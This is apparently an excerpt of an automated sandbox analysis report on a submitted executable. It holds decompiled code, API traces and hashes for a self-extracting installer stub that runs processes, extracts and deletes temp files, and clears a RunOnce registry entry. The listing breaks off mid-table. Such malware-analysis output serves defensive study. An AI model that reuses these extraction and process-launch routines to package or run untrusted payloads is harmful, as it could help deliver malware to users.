                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\$TMP4351$.TMP
                                                                        • API String ID: 747627703-908790857
                                                                        • Opcode ID: a880be9368042dd675a7ddfeec57d8aa4eefef7f82b853e46b1dbbc556c15d20
                                                                        • Instruction ID: 98189190b16e9289eee41ee1f290c0685d5e1a8b9defc004ed498144134523bb
                                                                        • Opcode Fuzzy Hash: a880be9368042dd675a7ddfeec57d8aa4eefef7f82b853e46b1dbbc556c15d20
                                                                        • Instruction Fuzzy Hash: 22117871A012147BC7246F7A9C0DB9B7E9EEF85770F004615F586D31D0CAB4D805A6A0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 631 f33fef-f34010 632 f34016-f3403b CreateProcessA 631->632 633 f3410a-f3411a call f36ce0 631->633 634 f34041-f3406e WaitForSingleObject GetExitCodeProcess 632->634 635 f340c4-f34101 call f36285 GetLastError FormatMessageA call f344b9 632->635 637 f34091 call f3411b 634->637 638 f34070-f34077 634->638 647 f34106 635->647 645 f34096-f340b8 CloseHandle * 2 637->645 638->637 641 f34079-f3407b 638->641 641->637 644 f3407d-f34089 641->644 644->637 648 f3408b 644->648 649 f340ba-f340c0 645->649 650 f34108 645->650 647->650 648->637 649->650 651 f340c2 649->651 650->633 651->647
                                                                        C-Code - Quality: 84%
                                                                        			E00F33FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                                                                        				signed int _v8;
                                                                        				char _v524;
                                                                        				long _v528;
                                                                        				struct _PROCESS_INFORMATION _v544;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t20;
                                                                        				void* _t22;
                                                                        				int _t25;
                                                                        				intOrPtr* _t39;
                                                                        				signed int _t44;
                                                                        				void* _t49;
                                                                        				signed int _t50;
                                                                        				intOrPtr _t53;
                                                                        
                                                                        				_t45 = __edx;
                                                                        				_t20 =  *0xf38004; // 0xc69e30f7
                                                                        				_v8 = _t20 ^ _t50;
                                                                        				_t39 = __ecx;
                                                                        				_t49 = 1;
                                                                        				_t22 = 0;
                                                                        				if(__ecx == 0) {
                                                                        					L13:
                                                                        					return E00F36CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                                                                        				}
                                                                        				asm("stosd");
                                                                        				asm("stosd");
                                                                        				asm("stosd");
                                                                        				asm("stosd");
                                                                        				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                                                                        				if(_t25 == 0) {
                                                                        					 *0xf39124 = E00F36285();
                                                                        					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0);
                                                                        					_t45 = 0x4c4;
                                                                        					E00F344B9(0, 0x4c4, _t39,  &_v524, 0x10, 0);
                                                                        					L11:
                                                                        					_t49 = 0;
                                                                        					L12:
                                                                        					_t22 = _t49;
                                                                        					goto L13;
                                                                        				}
                                                                        				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                                        				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                                                                        				_t44 = _v528;
                                                                        				_t53 =  *0xf38a28; // 0x0
                                                                        				if(_t53 == 0) {
                                                                        					_t34 =  *0xf39a2c; // 0x0
                                                                        					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                                        						_t34 = _t44 & 0xff000000;
                                                                        						if((_t44 & 0xff000000) == 0xaa000000) {
                                                                        							 *0xf39a2c = _t44;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				E00F3411B(_t34, _t44);
                                                                        				CloseHandle(_v544.hThread);
                                                                        				CloseHandle(_v544);
                                                                        				if(( *0xf39a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                                        					goto L12;
                                                                        				} else {
                                                                        					goto L11;
                                                                        				}
                                                                        			}


















                                                                        0x00f33fef
                                                                        0x00f33ffa
                                                                        0x00f34001
                                                                        0x00f34008
                                                                        0x00f3400a
                                                                        0x00f3400b
                                                                        0x00f34010
                                                                        0x00f3410a
                                                                        0x00f3411a
                                                                        0x00f3411a
                                                                        0x00f3401c
                                                                        0x00f3401d
                                                                        0x00f3401e
                                                                        0x00f3401f
                                                                        0x00f34033
                                                                        0x00f3403b
                                                                        0x00f340ca
                                                                        0x00f340e9
                                                                        0x00f340f8
                                                                        0x00f34101
                                                                        0x00f34106
                                                                        0x00f34106
                                                                        0x00f34108
                                                                        0x00f34108
                                                                        0x00000000
                                                                        0x00f34108
                                                                        0x00f34049
                                                                        0x00f3405c
                                                                        0x00f34062
                                                                        0x00f34068
                                                                        0x00f3406e
                                                                        0x00f34070
                                                                        0x00f34077
                                                                        0x00f3407f
                                                                        0x00f34089
                                                                        0x00f3408b
                                                                        0x00f3408b
                                                                        0x00f34089
                                                                        0x00f34077
                                                                        0x00f34091
                                                                        0x00f3409c
                                                                        0x00f340a8
                                                                        0x00f340b8
                                                                        0x00000000
                                                                        0x00f340c2
                                                                        0x00000000
                                                                        0x00f340c2

                                                                        APIs
                                                                        • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,00000000), ref: 00F34033
                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00F34049
                                                                        • GetExitCodeProcess.KERNELBASE ref: 00F3405C
                                                                        • CloseHandle.KERNEL32(?), ref: 00F3409C
                                                                        • CloseHandle.KERNEL32(?), ref: 00F340A8
                                                                        • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00F340DC
                                                                        • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00F340E9
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                        • String ID:
                                                                        • API String ID: 3183975587-0
                                                                        • Opcode ID: eb43d500c385ca0d3b752f266ca7d8adacd913b2403c40f00ea6b526d6d0319a
                                                                        • Instruction ID: c25df76f331dcca531967b924d3af7143d325d137c56038c415b64efffdeb28a
                                                                        • Opcode Fuzzy Hash: eb43d500c385ca0d3b752f266ca7d8adacd913b2403c40f00ea6b526d6d0319a
                                                                        • Instruction Fuzzy Hash: 0931C271A4020CBBEB20AB65DC48FAB777DEB94730F1001A9F545D21A0C674AD85EF11
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 652 f351e5-f3520b call f3468f LocalAlloc 655 f3522d-f3523c call f3468f 652->655 656 f3520d-f35228 call f344b9 call f36285 652->656 662 f35262-f35270 lstrcmpA 655->662 663 f3523e-f35260 call f344b9 LocalFree 655->663 668 f352b0 656->668 666 f35272-f35273 LocalFree 662->666 667 f3527e-f3529c call f344b9 LocalFree 662->667 663->668 670 f35279-f3527c 666->670 674 f352a6 667->674 675 f3529e-f352a4 667->675 672 f352b2-f352b5 668->672 670->672 674->668 675->670
                                                                        C-Code - Quality: 100%
                                                                        			E00F351E5(void* __eflags) {
                                                                        				int _t5;
                                                                        				void* _t6;
                                                                        				void* _t28;
                                                                        
                                                                        				_t1 = E00F3468F("UPROMPT", 0, 0) + 1; // 0x1
                                                                        				_t28 = LocalAlloc(0x40, _t1);
                                                                        				if(_t28 != 0) {
                                                                        					if(E00F3468F("UPROMPT", _t28, _t29) != 0) {
                                                                        						_t5 = lstrcmpA(_t28, "<None>"); // executed
                                                                        						if(_t5 != 0) {
                                                                        							_t6 = E00F344B9(0, 0x3e9, _t28, 0, 0x20, 4);
                                                                        							LocalFree(_t28);
                                                                        							if(_t6 != 6) {
                                                                        								 *0xf39124 = 0x800704c7;
                                                                        								L10:
                                                                        								return 0;
                                                                        							}
                                                                        							 *0xf39124 = 0;
                                                                        							L6:
                                                                        							return 1;
                                                                        						}
                                                                        						LocalFree(_t28);
                                                                        						goto L6;
                                                                        					}
                                                                        					E00F344B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                        					LocalFree(_t28);
                                                                        					 *0xf39124 = 0x80070714;
                                                                        					goto L10;
                                                                        				}
                                                                        				E00F344B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                        				 *0xf39124 = E00F36285();
                                                                        				goto L10;
                                                                        			}






                                                                        0x00f351fb
                                                                        0x00f35207
                                                                        0x00f3520b
                                                                        0x00f3523c
                                                                        0x00f35268
                                                                        0x00f35270
                                                                        0x00f3528b
                                                                        0x00f35293
                                                                        0x00f3529c
                                                                        0x00f352a6
                                                                        0x00f352b0
                                                                        0x00000000
                                                                        0x00f352b0
                                                                        0x00f3529e
                                                                        0x00f35279
                                                                        0x00000000
                                                                        0x00f3527b
                                                                        0x00f35273
                                                                        0x00000000
                                                                        0x00f35273
                                                                        0x00f3524a
                                                                        0x00f35250
                                                                        0x00f35256
                                                                        0x00000000
                                                                        0x00f35256
                                                                        0x00f35219
                                                                        0x00f35223
                                                                        0x00000000

                                                                        APIs
                                                                          • Part of subcall function 00F3468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F346A0
                                                                          • Part of subcall function 00F3468F: SizeofResource.KERNEL32(00000000,00000000,?,00F32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F346A9
                                                                          • Part of subcall function 00F3468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F346C3
                                                                          • Part of subcall function 00F3468F: LoadResource.KERNEL32(00000000,00000000,?,00F32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F346CC
                                                                          • Part of subcall function 00F3468F: LockResource.KERNEL32(00000000,?,00F32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F346D3
                                                                          • Part of subcall function 00F3468F: memcpy_s.MSVCRT ref: 00F346E5
                                                                          • Part of subcall function 00F3468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00F346EF
                                                                        • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00F32F4D,?,00000002,00000000), ref: 00F35201
                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00F35250
                                                                          • Part of subcall function 00F344B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00F34518
                                                                          • Part of subcall function 00F344B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00F34554
                                                                          • Part of subcall function 00F36285: GetLastError.KERNEL32(00F35BBC), ref: 00F36285
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                        • String ID: <None>$UPROMPT
                                                                        • API String ID: 957408736-2980973527
                                                                        • Opcode ID: b78f5ee1046be6326c34c8ddc196b97e01f7ea7e204786d3e0fa82b08e38b807
                                                                        • Instruction ID: a3f8a85adacdd360ba4c5a317066737590653766970583f59163a4bb6c80f3a1
                                                                        • Opcode Fuzzy Hash: b78f5ee1046be6326c34c8ddc196b97e01f7ea7e204786d3e0fa82b08e38b807
                                                                        • Instruction Fuzzy Hash: 6711C8B26046056FD3147B715C45F3B719EEBC9770F104429FA82E5191DABDEC017535
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 74%
                                                                        			E00F352B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				signed int _t9;
                                                                        				signed int _t11;
                                                                        				void* _t21;
                                                                        				void* _t29;
                                                                        				CHAR** _t31;
                                                                        				void* _t32;
                                                                        				signed int _t33;
                                                                        
                                                                        				_t28 = __edi;
                                                                        				_t22 = __ecx;
                                                                        				_t21 = __ebx;
                                                                        				_t9 =  *0xf38004; // 0xc69e30f7
                                                                        				_v8 = _t9 ^ _t33;
                                                                        				_push(__esi);
                                                                        				_t31 =  *0xf391e0; // 0x9c7c60
                                                                        				if(_t31 != 0) {
                                                                        					_push(__edi);
                                                                        					do {
                                                                        						_t29 = _t31;
                                                                        						if( *0xf38a24 == 0 &&  *0xf39a30 == 0) {
                                                                        							SetFileAttributesA( *_t31, 0x80); // executed
                                                                        							DeleteFileA( *_t31); // executed
                                                                        						}
                                                                        						_t31 = _t31[1];
                                                                        						LocalFree( *_t29);
                                                                        						LocalFree(_t29);
                                                                        					} while (_t31 != 0);
                                                                        					_pop(_t28);
                                                                        				}
                                                                        				_t11 =  *0xf38a20; // 0x0
                                                                        				_pop(_t32);
                                                                        				if(_t11 != 0 &&  *0xf38a24 == 0 &&  *0xf39a30 == 0) {
                                                                        					_push(_t22);
                                                                        					E00F31781( &_v268, 0x104, _t22, "C:\Users\FRONTD~1\AppData\Local\Temp\IXP001.TMP\");
                                                                        					if(( *0xf39a34 & 0x00000020) != 0) {
                                                                        						E00F365E8( &_v268);
                                                                        					}
                                                                        					SetCurrentDirectoryA(".."); // executed
                                                                        					_t22 =  &_v268;
                                                                        					E00F32390( &_v268);
                                                                        					_t11 =  *0xf38a20; // 0x0
                                                                        				}
                                                                        				if( *0xf39a40 != 1 && _t11 != 0) {
                                                                        					_t11 = E00F31FE1(_t22); // executed
                                                                        				}
                                                                        				 *0xf38a20 =  *0xf38a20 & 0x00000000;
                                                                        				return E00F36CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                                        			}












                                                                        0x00f352b6
                                                                        0x00f352b6
                                                                        0x00f352b6
                                                                        0x00f352c1
                                                                        0x00f352c8
                                                                        0x00f352cb
                                                                        0x00f352cc
                                                                        0x00f352d4
                                                                        0x00f352d6
                                                                        0x00f352d7
                                                                        0x00f352de
                                                                        0x00f352e0
                                                                        0x00f352f2
                                                                        0x00f352fa
                                                                        0x00f352fa
                                                                        0x00f35302
                                                                        0x00f35305
                                                                        0x00f3530c
                                                                        0x00f35312
                                                                        0x00f35316
                                                                        0x00f35316
                                                                        0x00f35317
                                                                        0x00f3531c
                                                                        0x00f3531f
                                                                        0x00f35333
                                                                        0x00f35345
                                                                        0x00f35351
                                                                        0x00f35359
                                                                        0x00f35359
                                                                        0x00f35363
                                                                        0x00f35369
                                                                        0x00f3536f
                                                                        0x00f35374
                                                                        0x00f35374
                                                                        0x00f35381
                                                                        0x00f35387
                                                                        0x00f35387
                                                                        0x00f3538f
                                                                        0x00f353a0

                                                                        APIs
                                                                        • SetFileAttributesA.KERNELBASE(009C7C60,00000080,?,00000000), ref: 00F352F2
                                                                        • DeleteFileA.KERNELBASE(009C7C60), ref: 00F352FA
                                                                        • LocalFree.KERNEL32(009C7C60,?,00000000), ref: 00F35305
                                                                        • LocalFree.KERNEL32(009C7C60), ref: 00F3530C
                                                                        • SetCurrentDirectoryA.KERNELBASE(00F311FC,?,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\), ref: 00F35363
                                                                        Strings
                                                                        • C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\, xrefs: 00F35334
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\
                                                                        • API String ID: 2833751637-3217841213
                                                                        • Opcode ID: 9774ac1b927134ce6cfe381949b722dd6c2984fb4d50e60ac536c45a168e9414
                                                                        • Instruction ID: 0d94df3641f27b85a12556c4ee48eed2cf3e502862b95431fab0320f26a34eee
                                                                        • Opcode Fuzzy Hash: 9774ac1b927134ce6cfe381949b722dd6c2984fb4d50e60ac536c45a168e9414
                                                                        • Instruction Fuzzy Hash: 4621A131904608EBDB24AB20DD49BA977B6BB50BB0F040259F482972A0CFF99D85FB51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00F31FE1(void* __ecx) {
                                                                        				void* _v8;
                                                                        				long _t4;
                                                                        
                                                                        				if( *0xf38530 != 0) {
                                                                        					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                                        					if(_t4 == 0) {
                                                                        						RegDeleteValueA(_v8, "wextract_cleanup1"); // executed
                                                                        						return RegCloseKey(_v8);
                                                                        					}
                                                                        				}
                                                                        				return _t4;
                                                                        			}





                                                                        0x00f31fee
                                                                        0x00f32005
                                                                        0x00f3200d
                                                                        0x00f32017
                                                                        0x00000000
                                                                        0x00f32020
                                                                        0x00f3200d
                                                                        0x00f32029

                                                                        APIs
                                                                        • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,00F3538C,?,?,00F3538C), ref: 00F32005
                                                                        • RegDeleteValueA.KERNELBASE(00F3538C,wextract_cleanup1,?,?,00F3538C), ref: 00F32017
                                                                        • RegCloseKey.ADVAPI32(00F3538C,?,?,00F3538C), ref: 00F32020
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: CloseDeleteOpenValue
                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup1
                                                                        • API String ID: 849931509-1592051331
                                                                        • Opcode ID: 1ce379187f1102c8589abb00c0ec96bb87c8db7d528ae4463f98a776f1a18119
                                                                        • Instruction ID: fa3428b061593183e9fbb1fb0225df4a7a7b3e165edd3fb07acda3a2eacac69d
                                                                        • Opcode Fuzzy Hash: 1ce379187f1102c8589abb00c0ec96bb87c8db7d528ae4463f98a776f1a18119
                                                                        • Instruction Fuzzy Hash: 10E086B195031CBBD7298F91ED4AF5D7F2AF7007B0F140194F944A00A0EBB59E14F606
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E00F34CD0(char* __edx, long _a4, int _a8) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t29;
                                                                        				int _t30;
                                                                        				long _t32;
                                                                        				signed int _t33;
                                                                        				long _t35;
                                                                        				long _t36;
                                                                        				struct HWND__* _t37;
                                                                        				long _t38;
                                                                        				long _t39;
                                                                        				long _t41;
                                                                        				long _t44;
                                                                        				long _t45;
                                                                        				long _t46;
                                                                        				signed int _t50;
                                                                        				long _t51;
                                                                        				char* _t58;
                                                                        				long _t59;
                                                                        				char* _t63;
                                                                        				long _t64;
                                                                        				CHAR* _t71;
                                                                        				CHAR* _t74;
                                                                        				int _t75;
                                                                        				signed int _t76;
                                                                        
                                                                        				_t69 = __edx;
                                                                        				_t29 =  *0xf38004; // 0xc69e30f7
                                                                        				_t30 = _t29 ^ _t76;
                                                                        				_v8 = _t30;
                                                                        				_t75 = _a8;
                                                                        				if( *0xf391d8 == 0) {
                                                                        					_t32 = _a4;
                                                                        					__eflags = _t32;
                                                                        					if(_t32 == 0) {
                                                                        						_t33 = E00F34E99(_t75);
                                                                        						L35:
                                                                        						return E00F36CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                                                                        					}
                                                                        					_t35 = _t32 - 1;
                                                                        					__eflags = _t35;
                                                                        					if(_t35 == 0) {
                                                                        						L9:
                                                                        						_t33 = 0;
                                                                        						goto L35;
                                                                        					}
                                                                        					_t36 = _t35 - 1;
                                                                        					__eflags = _t36;
                                                                        					if(_t36 == 0) {
                                                                        						_t37 =  *0xf38584; // 0x0
                                                                        						__eflags = _t37;
                                                                        						if(_t37 != 0) {
                                                                        							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                                                                        						}
                                                                        						_t54 = 0xf391e4;
                                                                        						_t58 = 0xf391e4;
                                                                        						do {
                                                                        							_t38 =  *_t58;
                                                                        							_t58 =  &(_t58[1]);
                                                                        							__eflags = _t38;
                                                                        						} while (_t38 != 0);
                                                                        						_t59 = _t58 - 0xf391e5;
                                                                        						__eflags = _t59;
                                                                        						_t71 =  *(_t75 + 4);
                                                                        						_t73 =  &(_t71[1]);
                                                                        						do {
                                                                        							_t39 =  *_t71;
                                                                        							_t71 =  &(_t71[1]);
                                                                        							__eflags = _t39;
                                                                        						} while (_t39 != 0);
                                                                        						_t69 = _t71 - _t73;
                                                                        						_t30 = _t59 + 1 + _t71 - _t73;
                                                                        						__eflags = _t30 - 0x104;
                                                                        						if(_t30 >= 0x104) {
                                                                        							L3:
                                                                        							_t33 = _t30 | 0xffffffff;
                                                                        							goto L35;
                                                                        						}
                                                                        						_t69 = 0xf391e4;
                                                                        						_t30 = E00F34702( &_v268, 0xf391e4,  *(_t75 + 4));
                                                                        						__eflags = _t30;
                                                                        						if(__eflags == 0) {
                                                                        							goto L3;
                                                                        						}
                                                                        						_t41 = E00F3476D( &_v268, __eflags);
                                                                        						__eflags = _t41;
                                                                        						if(_t41 == 0) {
                                                                        							goto L9;
                                                                        						}
                                                                        						_push(0x180);
                                                                        						_t30 = E00F34980( &_v268, 0x8302); // executed
                                                                        						_t75 = _t30;
                                                                        						__eflags = _t75 - 0xffffffff;
                                                                        						if(_t75 == 0xffffffff) {
                                                                        							goto L3;
                                                                        						}
                                                                        						_t30 = E00F347E0( &_v268);
                                                                        						__eflags = _t30;
                                                                        						if(_t30 == 0) {
                                                                        							goto L3;
                                                                        						}
                                                                        						 *0xf393f4 =  *0xf393f4 + 1;
                                                                        						_t33 = _t75;
                                                                        						goto L35;
                                                                        					}
                                                                        					_t44 = _t36 - 1;
                                                                        					__eflags = _t44;
                                                                        					if(_t44 == 0) {
                                                                        						_t54 = 0xf391e4;
                                                                        						_t63 = 0xf391e4;
                                                                        						do {
                                                                        							_t45 =  *_t63;
                                                                        							_t63 =  &(_t63[1]);
                                                                        							__eflags = _t45;
                                                                        						} while (_t45 != 0);
                                                                        						_t74 =  *(_t75 + 4);
                                                                        						_t64 = _t63 - 0xf391e5;
                                                                        						__eflags = _t64;
                                                                        						_t69 =  &(_t74[1]);
                                                                        						do {
                                                                        							_t46 =  *_t74;
                                                                        							_t74 =  &(_t74[1]);
                                                                        							__eflags = _t46;
                                                                        						} while (_t46 != 0);
                                                                        						_t73 = _t74 - _t69;
                                                                        						_t30 = _t64 + 1 + _t74 - _t69;
                                                                        						__eflags = _t30 - 0x104;
                                                                        						if(_t30 >= 0x104) {
                                                                        							goto L3;
                                                                        						}
                                                                        						_t69 = 0xf391e4;
                                                                        						_t30 = E00F34702( &_v268, 0xf391e4,  *(_t75 + 4));
                                                                        						__eflags = _t30;
                                                                        						if(_t30 == 0) {
                                                                        							goto L3;
                                                                        						}
                                                                        						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                                                                        						_t30 = E00F34C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                                                                        						__eflags = _t30;
                                                                        						if(_t30 == 0) {
                                                                        							goto L3;
                                                                        						}
                                                                        						E00F34B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                                                                        						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                                                                        						__eflags = _t50;
                                                                        						if(_t50 != 0) {
                                                                        							_t51 = _t50 & 0x00000027;
                                                                        							__eflags = _t51;
                                                                        						} else {
                                                                        							_t51 = 0x80;
                                                                        						}
                                                                        						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                                                                        						__eflags = _t30;
                                                                        						if(_t30 == 0) {
                                                                        							goto L3;
                                                                        						} else {
                                                                        							_t33 = 1;
                                                                        							goto L35;
                                                                        						}
                                                                        					}
                                                                        					_t30 = _t44 - 1;
                                                                        					__eflags = _t30;
                                                                        					if(_t30 == 0) {
                                                                        						goto L3;
                                                                        					}
                                                                        					goto L9;
                                                                        				}
                                                                        				if(_a4 == 3) {
                                                                        					_t30 = E00F34B60( *((intOrPtr*)(_t75 + 0x14)));
                                                                        				}
                                                                        				goto L3;
                                                                        			}































                                                                        0x00f34cd0
                                                                        0x00f34cdb
                                                                        0x00f34ce0
                                                                        0x00f34ce2
                                                                        0x00f34cee
                                                                        0x00f34cf2
                                                                        0x00f34d0e
                                                                        0x00f34d0e
                                                                        0x00f34d11
                                                                        0x00f34e83
                                                                        0x00f34e88
                                                                        0x00f34e98
                                                                        0x00f34e98
                                                                        0x00f34d17
                                                                        0x00f34d17
                                                                        0x00f34d1a
                                                                        0x00f34d2f
                                                                        0x00f34d2f
                                                                        0x00000000
                                                                        0x00f34d2f
                                                                        0x00f34d1c
                                                                        0x00f34d1c
                                                                        0x00f34d1f
                                                                        0x00f34dcb
                                                                        0x00f34dd0
                                                                        0x00f34dd2
                                                                        0x00f34ddd
                                                                        0x00f34ddd
                                                                        0x00f34de3
                                                                        0x00f34de8
                                                                        0x00f34ded
                                                                        0x00f34ded
                                                                        0x00f34def
                                                                        0x00f34df0
                                                                        0x00f34df0
                                                                        0x00f34df4
                                                                        0x00f34df4
                                                                        0x00f34df6
                                                                        0x00f34df9
                                                                        0x00f34dfc
                                                                        0x00f34dfc
                                                                        0x00f34dfe
                                                                        0x00f34dff
                                                                        0x00f34dff
                                                                        0x00f34e03
                                                                        0x00f34e08
                                                                        0x00f34e0a
                                                                        0x00f34e0f
                                                                        0x00f34d03
                                                                        0x00f34d03
                                                                        0x00000000
                                                                        0x00f34d03
                                                                        0x00f34e18
                                                                        0x00f34e20
                                                                        0x00f34e25
                                                                        0x00f34e27
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f34e33
                                                                        0x00f34e38
                                                                        0x00f34e3a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f34e40
                                                                        0x00f34e51
                                                                        0x00f34e56
                                                                        0x00f34e5b
                                                                        0x00f34e5e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f34e6a
                                                                        0x00f34e6f
                                                                        0x00f34e71
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f34e77
                                                                        0x00f34e7d
                                                                        0x00000000
                                                                        0x00f34e7d
                                                                        0x00f34d25
                                                                        0x00f34d25
                                                                        0x00f34d28
                                                                        0x00f34d36
                                                                        0x00f34d3b
                                                                        0x00f34d40
                                                                        0x00f34d40
                                                                        0x00f34d42
                                                                        0x00f34d43
                                                                        0x00f34d43
                                                                        0x00f34d47
                                                                        0x00f34d4a
